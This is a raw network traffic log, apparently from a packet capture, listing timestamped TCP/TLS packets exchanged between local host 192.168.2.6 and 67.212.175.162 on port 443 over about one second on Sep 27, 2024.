                                                            Sep 27, 2024 16:01:04.728663921 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.728888988 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.728904963 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.728924990 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.728975058 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.729063988 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.729662895 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.729795933 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.729950905 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.730041981 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.730624914 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.730901957 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.747057915 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.747215986 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.747261047 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.747339010 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.747688055 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.747916937 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.814966917 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.815175056 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.815201998 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.815280914 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.815756083 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.815860033 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.816229105 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.816273928 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.816348076 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.816348076 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.816376925 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.816431046 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.817200899 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.817248106 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.817286015 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.817286968 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.817300081 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.817329884 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.817965984 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.818109989 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.819981098 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.820030928 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.820110083 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.820122004 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.820136070 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.820245981 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.820482969 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.820523977 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.820564032 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.820573092 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.820605040 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.820684910 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.821084023 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.822045088 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.825025082 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.825025082 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.835988998 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.836344957 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.836399078 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.836415052 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.836415052 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.836430073 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.836612940 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.884457111 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.902755022 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.903099060 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.903270006 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.903352976 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.903721094 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.903767109 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.903812885 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.903812885 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.903830051 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.903951883 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.904247046 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.904346943 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.904846907 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.904895067 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.904927969 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.904932022 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.904961109 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.904961109 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.905827045 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.905869007 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.905900002 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.905905962 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.905935049 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.906107903 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.906747103 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.906793118 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.906836033 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.906840086 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.906871080 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.907141924 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.907676935 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.907738924 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.907746077 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.907758951 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.907900095 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.908294916 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.908469915 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.924333096 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.924525976 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.924674034 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.924730062 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.925005913 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.925077915 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.991322041 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.991508961 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.991511106 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.991522074 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.991739035 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.992125034 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.992167950 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.992188931 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.992196083 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.992216110 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.992522001 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.992861032 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.992904902 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.992978096 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.992978096 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.992983103 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.993169069 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.993709087 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.993799925 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.994355917 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.994412899 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.994427919 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.994432926 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.994455099 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.994482994 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.995275974 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.995322943 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.995332003 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.995342970 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.995400906 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.995400906 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.996190071 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.996234894 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.996571064 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.996571064 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:04.996577024 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:04.996637106 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.013087988 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.013237000 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.013421059 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.013516903 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.013787031 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.013870955 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.080147028 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.080327988 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.080328941 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.080339909 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.080528021 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.080764055 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.080843925 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.081002951 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.081068039 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.081665993 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.081710100 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.081734896 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.081756115 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.081767082 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.081818104 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.082535028 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.082662106 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.083312035 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.083359003 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.083419085 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.083419085 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.083432913 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.083728075 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.084079981 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.084129095 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.084170103 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.084186077 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.084186077 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.084201097 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.084336996 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.085022926 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.085072041 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.085112095 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.085118055 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.085275888 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.085275888 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.095801115 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.095956087 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.101881981 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.102041960 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.102118015 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.102175951 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.102670908 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.102756023 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.168922901 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.169084072 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.169097900 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.169126987 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.169450998 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.169450998 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.169925928 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.170017958 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.170030117 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.170514107 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.170552015 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.170644999 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.170644999 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.170685053 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.170747042 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.170747042 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.171458006 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.171576023 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.171586037 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.171669006 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.172380924 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.172455072 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.172480106 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.172560930 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.172646046 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.172961950 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.173321962 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.173418999 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.173439026 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.173445940 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.173495054 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.173495054 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.174185991 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.174309015 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.190134048 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.190471888 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.190538883 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.190538883 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.190550089 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.190675974 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.190963030 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.191082954 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.257431984 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.257582903 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.257775068 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.257905960 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.258245945 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.258320093 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.258586884 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.258652925 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.258928061 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.259006977 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.259485006 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.259690046 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.259840965 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.259891987 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.259902954 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.259910107 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.260039091 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.260039091 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.260737896 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.260787010 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.260802984 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.260812044 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.260828018 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.260839939 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.260864973 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.260869980 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.260900974 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.260941982 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.261688948 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.261754036 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.261779070 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.261785984 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.261811972 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.261820078 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.279234886 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.279370070 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.279664993 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.279784918 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.280052900 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.280123949 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.346575022 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.346725941 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.346749067 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.346760035 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.346981049 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.347146034 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.347233057 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.347470045 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.347541094 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.347543955 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.347584963 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.347619057 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.347755909 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.348288059 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.348387003 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.348387957 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.348412991 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.348453999 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.348504066 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.349174023 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.349287033 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.349390984 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.349390984 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.349405050 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.349483967 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.349925995 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.349967003 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.349992990 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.350006104 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.350043058 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.350090981 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.350862980 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.350898027 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.350934029 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.350943089 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.351000071 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.351000071 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.351667881 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.351908922 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.356347084 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.356583118 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.368056059 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.368166924 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.368545055 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.368618965 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.368983984 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.369072914 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.409202099 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.409202099 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.435142994 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.435409069 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.435551882 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.435637951 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.436100960 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.436223984 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.436280966 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.436280966 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.436300039 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.436340094 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.436942101 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.437028885 CEST4434971067.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:05.437072992 CEST49710443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:05.437087059 CEST4434971067.212.175.162192.168.2.6
